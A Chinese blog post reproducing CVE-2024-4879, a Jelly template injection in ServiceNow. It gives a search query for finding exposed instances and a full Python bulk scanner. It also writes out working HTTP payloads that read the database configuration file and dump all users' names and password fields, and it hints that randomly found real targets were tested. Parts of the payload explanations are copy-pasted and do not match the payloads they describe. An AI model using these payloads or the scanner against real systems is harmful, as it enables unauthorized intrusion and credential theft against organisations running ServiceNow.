【漏洞复现】ServiceNow UI Jelly模板注入(CVE-2024-4879)

于 2024-07-28 00:30:00 发布
阅读量1.3k 收藏 23
点赞数 13
分类专栏: 漏洞复现 文章标签: php 开发语言 安全 网络 web安全 计算机网络 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54799594/article/details/140672041
版权

        声明:本文档或演示材料仅用于教育和教学目的。如果任何个人或组织利用本文档中的信息进行非法活动,将与本文档的作者或发布者无关。

一、漏洞描述

ServiceNow是一家专注于提供企业级云计算服务的企业,其旗舰产品是基于云的服务管理解决方案,旨在协助各组织简化及自动化其业务流程。然而,该公司的Jelly模板和Glide表达式存在安全漏洞,这使得未经授权的攻击者有机会通过构建恶意请求来利用这些漏洞,进而实现远程代码的执行。

二、资产收集

1.使用网络空间测绘引擎搜索

鹰图检索:web.body="ConditionalFocus.jsdbx"

2.使用poc批量扫描

# 导入所需库
import requests
import argparse
import threading
import queue
import os
from requests.exceptions import RequestException
from datetime import datetime
import urllib3
import signal
import sys

# 禁用安全警告
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# 定义颜色代码
dimmed_gray_color = '\033[90m'
honey_yellow_color = "\033[38;5;214m"
dim_yellow_color = '\033[33;1m'
cyan_color = '\033[96m'
green_color = '\033[92m'
red_color = '\033[31m'
light_orange_color = '\033[38;5;214m'
reset_color = '\033[0m'

# 显示横幅信息
def banner():
    print(f"""
{light_orange_color}                                                                      
  ______     _______     ____   ___ ____  _  _         _  _    ___ _____ ___  
 / ___\ \   / / ____|   |___ \ / _ \___ \| || |       | || |  ( _ )___  / _ \ 
| |    \ \ / /|  _| _____ __) | | | |__) ||| |_ _____||| |_ / _ \  / / (_) |
| |___  \ V / | |__|_____/ __/| |_| / __/|__   _|_____|__   _| (_) |/ / \__, |
 \____|  \_/  |_____|   |_____|\___/_____|  |_|          |_|  \___//_/    /_/ 
                               
{reset_color}-> Bulk scanning tool for ServiceNow CVE-2024-4879 vulnerability.{reset_color}
{reset_color}{dimmed_gray_color}-> By x.com/MohamedNab1l
{light_orange_color}-> Use Wisely.{reset_color}
""")

# 日志目录和文件路径
LOG_DIR = 'logs'
LOG_FILE = os.path.join(LOG_DIR, 'scan.log')

# 创建日志目录
def create_log_dir():
    if not os.path.exists(LOG_DIR):
        os.makedirs(LOG_DIR)
        print_message('info', f"Log directory created: {LOG_DIR}")

# 记录日志信息
def log_message(message):
    with open(LOG_FILE, 'a') as log_file:
        log_file.write(f"{datetime.now().strftime('%Y-%m-%d %H:%M:%S')} - {message}")

# 打印不同级别的消息
def print_message(level, message):
    if level == 'vulnerable':
        print(f"{cyan_color}[VLUN] {message}{reset_color}")
    if level == 'info':
        print(f"{dimmed_gray_color}[INFO] {message}{reset_color}")
    elif level == 'success':
        print(f"{green_color}[VLUN] {message}{reset_color}")
    elif level == 'warning':
        print(f"{honey_yellow_color}[WARNING] {message}{reset_color}")
    elif level == 'error':
        print(f"{red_color}[ERROR] {message}{reset_color}")
    log_message(message)

# 需要检查的路径,包含漏洞利用代码
paths_to_check = "/login.do?jvar_page_title=<style><j:jelly xmlns:j=\"jelly\" xmlns:g='glide'><g:evaluate>gs.addErrorMessage(7*191);</g:evaluate></j:jelly></style>"

# 发起请求并获取响应内容
def make_request(url):
    try:
        response = requests.get(url, verify=False)
        if response.status_code == 200:
            return response.text
        else:
            return None
    except requests.RequestException as e:
        return None

# 测试目标URL是否受漏洞影响
def test_host(url):
    try:
        fullurl = f"{url}{paths_to_check}"
        body = make_request(fullurl)
        if body is not None and '>1337<' in body:
            print_message('vulnerable', f"Vulnerable: {url}")
            #print(body)
        else:
            print_message('warning', f"Not Vulnerable: {url}")
    except requests.RequestException as e:
        print_message('error', f"Timeout: {url}")

# 工作线程函数,从队列中取出URL并测试其是否受漏洞影响
def worker(queue):
    while not queue.empty():
        url = queue.get()
        print_message('info', f"Testing {url}")
        test_host(url)
        queue.task_done()

# 处理Ctrl+C信号,优雅退出程序
def signal_handler(sig, frame):
    print_message('error', 'You pressed Ctrl+C! Exiting gracefully.')
    sys.exit(0)

# 主函数,解析命令行参数并执行相应的操作
def main():
    signal.signal(signal.SIGINT, signal_handler)
    banner()
    parser = argparse.ArgumentParser(description='Bulk scanning tool for ServiceNow CVE-2024-4879.')
    group = parser.add_mutually_exclusive_group(required=True)
    group.add_argument('-u', '--url', help='Target URL (e.g., http://example.com)')
    group.add_argument('-f', '--file', help='File containing list of URLs (one per line)')

    args = parser.parse_args()

    create_log_dir()

    if args.url:
        print_message('info', f"Testing single target: {args.url}")
        test_host(args.url)
    elif args.file:
        with open(args.file, 'r') as f:
            urls = [line.strip() for line in f if line.strip()]
      
        print_message('info', f"Testing multiple targets from file: {args.file}")

        url_queue = queue.Queue()
        for url in urls:
            url_queue.put(url)

        threads = []
        for _ in range(10):
            t = threading.Thread(target=worker, args=(url_queue,))
            t.start()
            threads.append(t)

        for t in threads:
            t.join()

        print_message('info', "Scanning complete.")

if __name__ == '__main__':
    main()

cmd运行:python poc.py -f host.txt

 随机寻找的幸运儿

三、漏洞复现 

1.构造数据包

1.构造数据包:

GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Egs.addErrorMessage(111*111);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E HTTP/1.1
Host:  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close

 2.读取数据库配置

GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly:core%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Ez=new%20Packages.java.io.File(%22%22).getAbsolutePath();z=z.substring(0,z.lastIndexOf(%22/%22));u=new%20SecurelyAccess(z.concat(%22/co..nf/glide.db.properties%22)).getBufferedReader();s=%22%22;while((q=u.readLine())!==null)s=s.concat(q,%22%5Cn%22);gs.addErrorMessage(s);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E%22 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close

3.查看用户名密码

GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Egr=new%20GlideRecord(%22sys_user%22);gr.query();s=%22%22;while(gr.next())s=s.concat(gr.user_name,%22%20:%20%22,gr.user_password,%22%3Cbr/%3E%22);gs.addErrorMessage(s);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E HTTP/1.1
Host:  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close

2.数据包分析 

1.构造数据包

1. 请求行:`GET /login.do?

请求参数jvar_page_title的值经过URL编码,解码后为:

<style><j:jelly xmlns:j="jelly" xmlns:g="glide"><g:evaluate>gs.addErrorMessage(111*111);</g:evaluate></j:jelly></style>

这里是一个典型的服务器端模板注入(SSTI)攻击。攻击者尝试通过篡改请求参数来注入恶意代码。具体来说:

  • <style>标签被用来插入恶意代码,这样做可能是为了利用CSS的作用域来执行JavaScript代码。
  • <j:jelly><g:evaluate>是Jelly模板引擎的标签,用于在服务器端执行Jelly脚本。
  • gs.addErrorMessage(111*111);是Jelly脚本的一部分,它执行了一个乘法运算并将结果添加到错误消息中。这里的乘法运算看起来是无害的,但这可能是为了测试注入是否成功。在更复杂的攻击中,攻击者可能会执行更有害的操作,如读取文件内容、执行系统命令等。

2.读取数据库配置

  1. 请求参数jvar_page_title的值经过URL编码,解码后为:

    <style><j:jelly xmlns:j="jelly:core" xmlns:g="glide"><g:evaluate>z=new Packages.java.io.File("").getAbsolutePath();z=z.substring(0,z.lastIndexOf("/"));u=new SecurelyAccess(z.concat("/co..nf/glide.db.properties")).getBufferedReader();s="";while((q=u.readLine())!==null)s=s.concat(q,"\n");gs.addErrorMessage(s);</g:evaluate></j:jelly></style>

    这里是一个典型的服务器端模板注入(SSTI)攻击。

    • <style>标签被用来插入恶意代码,这样做可能是为了利用CSS的作用域来执行JavaScript代码。
    • <j:jelly><g:evaluate>是Jelly模板引擎的标签,用于在服务器端执行Jelly脚本。
    • z=new Packages.java.io.File("").getAbsolutePath();获取当前工作目录的绝对路径。
    • z=z.substring(0,z.lastIndexOf("/"));从绝对路径中移除最后一个斜杠及其后面的部分,得到父目录的路径。
    • u=new SecurelyAccess(z.concat("/co..nf/glide.db.properties")).getBufferedReader();尝试打开位于父目录下名为co..nf/glide.db.properties的文件,并创建一个BufferedReader对象来读取文件内容。
    • s="";while((q=u.readLine())!==null)s=s.concat(q,"\n");逐行读取文件内容,并将其拼接到字符串s中,每行之间用换行符分隔。
    • gs.addErrorMessage(s);将读取到的文件内容作为错误消息添加到系统中。这里的乘法运算看起来是无害的,但这可能是为了测试注入是否成功。在更复杂的攻击中,攻击者可能会执行更有害的操作,如读取文件内容、执行系统命令等。

3.查看用户名密码

  1. 请求参数jvar_page_title的值经过URL编码,解码后为:
  2. <style><j:jelly xmlns:j="jelly" xmlns:g="glide"><g:evaluate>gr=new GlideRecord("sys_user");gr.query();s="";while(gr.next())s=s.concat(gr.user_name, " : ",gr.user_password,"<br/>");gs.addErrorMessage(s);</g:evaluate></j:jelly></style>
  3. 这里是一个典型的服务器端模板注入(SSTI)攻击。
  4. <style>标签被用来插入恶意代码,这样做可能是为了利用CSS的作用域来执行JavaScript代码。
  5. <j:jelly>和<g:evaluate>是Jelly模板引擎的标签,用于在服务器端执行Jelly脚本。
  6. gr=new GlideRecord("sys_user");创建一个名为sys_user的GlideRecord对象。
  7. gr.query();执行查询操作,获取所有用户记录。
  8. s="";while(gr.next())s=s.concat(gr.user_name, " : ",gr.user_password,"<br/>");遍历查询结果,并将用户名和密码拼接成一个字符串,每个用户的用户名和密码之间用冒号和换行符分隔。
  9. gs.addErrorMessage(s);将拼接好的字符串作为错误消息添加到系统中。这里的乘法运算看起来是无害的,但这可能是为了测试注入是否成功。在更复杂的攻击中,攻击者可能会执行更有害的操作,如读取文件内容、执行系统命令等。

3.结束跑路

1.构造数据包

2.构造数据包,读取数据库配置

3.查看用户名密码

每篇一言:要不断的移动像水一样,才不会变成死水一样,你要不断流动着!

ServiceNow UI Jelly模板注入漏洞复现(CVE-2024-4879)
0xSec
07-14 1160
由于ServiceNowJelly模板输入验证不严格,导致未经身份验证的远程攻击者可通过构造恶意请求利用,在ServiceNow中远程执行代码,获取数据库配置等等,使系统处于极不安全的状态。
漏洞复现】京师心智心理健康测评系统MyReport.ashx存在敏感信息泄露
失心少年
03-21 348
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!漏洞链接:http://127.0.0.1/FunctionModular/PersonalReport/Ajax/MyReport.ashx?
Goby漏洞发布 | CVE-2024-4879 ServiceNowUI /login.do Jelly模板注入漏洞【已复现
m0_46699477的博客
07-17 711
CVE-2024-4879:ServiceNowJelly模板和Glide表达式由于输入验证不严格,存在注入漏洞。这些漏洞可以被未经身份验证的攻击者通过构造恶意请求利用,在ServiceNow中获取敏感文件,甚至远程执行代码。
6.2 ServiceNow 自动化测试框架 (ATF) 简介
蚊者逆袭的博客
03-21 1741
ServiceNow 自动化测试框架(Automated Test Framework(ATF))是ServiceNow平台上的一种自动化测试工具,旨在帮助开发人员和测试人员快速、高效地创建和运行测试用例。ATF允许用户记录和回放交互式测试,同时还支持JavaScript编写的自定义测试脚本。通过ATF,用户可以轻松地执行端到端的集成测试,确保应用程序在ServiceNow平台上的正常运行。ATF提供了丰富的功能,包括创建测试套件、记录测试步骤、管理测试数据、执行测试、生成测试报告等。
ServiceNow 基础手册
11-21
ServiceNow 平台基础说明和使用指南,希望对大家有所帮助
ServiceNow 中关于UI Action 在portal端的使用
weixin_34355715的博客
02-18 932
在 portal端是可以使用Form和UI Action的,例如:var data.f= $sp.getForm();//需要添加上相应参数在开箱组件'Form'的Server script中就有如下代码:data.f = $sp.getForm(data.table, data.sys_id, data.query, data.view);data.f对象中就包含了UI Action对象 dat...
CVE-2024-38819:Spring 框架路径遍历 PoC 漏洞复现
12-16
CVE-2024-38819漏洞是一个影响Spring框架的严重安全漏洞。Spring框架是广泛应用于Java开发中的一个开源框架,它提供了全面的编程和配置模型。该漏洞特别关注于路径遍历问题,这是一种安全漏洞,攻击者可以利用它来...
CVE-2024-53677
最新发布
12-17
CVE-2024-53677 – 关键的 Apache Struts 远程代码执行漏洞 已在流行的 Apache Struts 框架中发现了一个严重漏洞 CVE-2024-53677,该漏洞可能允许攻击者远程执行任意代码。该漏洞是由文件上传逻辑中的缺陷引起的,...
exploit (Linux 内核CVE-2024-1086漏洞复现脚本)
06-06
Linux 内核CVE-2024-1086漏洞复现脚本。 在普通用户下,将文件上传后,chmod 777 exploit ,然后运行 ./exploit ,提权成功,输入id,可看到已经是root权限 。
CVE-2024-38077漏洞检测工具
08-15
检测某个ip地址是否存在CVE-2024-38077漏洞,Windows 远程桌面授权服务远程代码执行漏洞。 使用方法:test.exe 192.168.1.2,扫描IP地址为192.168.1.2机器是否存在漏洞
service学习
09-12
service notifation的综合应用
CVE』简析CVE-2024-48795 SSH协议前缀截断攻击(Terrapin攻击)
04-15 1019
最近很多小伙伴找我要Linux学习资料,于是我翻箱倒柜,整理了一些优质资源,涵盖视频、电子书、PPT等共享给大家!
CVE』简析CVE-2023-48795 SSH协议前缀截断攻击(Terrapin攻击)(3)
2401_84973175的博客
05-13 1089
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
服务端模板注入(SSTI)下
why811的博客
07-18 876
对于检测来说,模板注入漏洞通常Payload有较为明显的特征,因此可以通过这些特征去完善WAF检测规则,模板注入的危害通常是导致代码执行,具体的危害根据攻击者执行代码的内容来确定,对于比较敏感的行为如命令执行或者文件读取等,可以通过HIPS或者RASP进行检测,但是对于一些不是特别敏感的行为,如仅获取敏感信息,对于这类行为不是很好检测,因此RASP在防御中,还是需要去对模板注入触发的函数进行打点,并进行分析。当settings文件配置不当的时候可以通过include标签和extends标签,读取文件内容。
SSTI 模板注入漏洞总结之[BJDCTF2020]Cookie is so stable
qq_58970968的博客
07-23 1376
config是Flask模版中的一个全局对象,它代表“当前配置对象(flask.config)”,它是一个类字典的对象,它包含了所有应用程序的配置值。当在服务端接收了用户的恶意输入以后,未经任何处理就将其作为Web应用模板内容的一部分,模板引擎在进行目标编译渲染的过程中,执行了用户插入的可以破坏模板的语句,因而可能导致了敏感信息泄露、代码执行、GetShell等问题.使用{{7*'7'}}还是回显49,看来是Twig;在flag界面输入{{7*7}}{{7*‘7’}}输出49。...
Glide资源图加载失败
snpmyn
01-10 4822
场景 Glide加载网络或手机相册图均正常,但加载drawable或mipmap资源图(PNG或SVG)失败。 求证 上述场景基于3.7.0版,加载代码如下: /** * SD卡图加载 * * @param context * @param uri * @param pID * @param iv */ public static void displayByUri(Cont
Glide使用时遇到的坑
gengbaolong的博客
11-30 1953
项目中使用到glide加载网络https图片。这里把遇到的问题记录一下。 1. 在加载图片的时候一般会设置占位图片 ,我们会加一个placeholder (loadingImage)如下: Glide.with(mContext).load(path).placeholder(loadingImage).error(errorImageView).into(mImageView); 但是会...
Glide关于清除缓存策略
kristch_wu的博客
04-17 6323
Glide已经很强大了 自带缓存清楚功能清除内存缓存:Glide.get(activity).clearMemory()清除磁盘缓存:Glide.get(activity).clearDiskCache();其中需要注意的是:1 清除内存缓存是在主线程中2 清除磁盘缓存是在子线程中进行如果需要自定义缓存到sd卡中 这样清除磁盘缓存才会用的到1 需要在build gradle 添加依赖impleme...
Glide开源库存在的暗坑
独领fengsao的猫
08-03 764
Glide开源库中文ua存在的暗坑
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

抓跟ミgragon

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值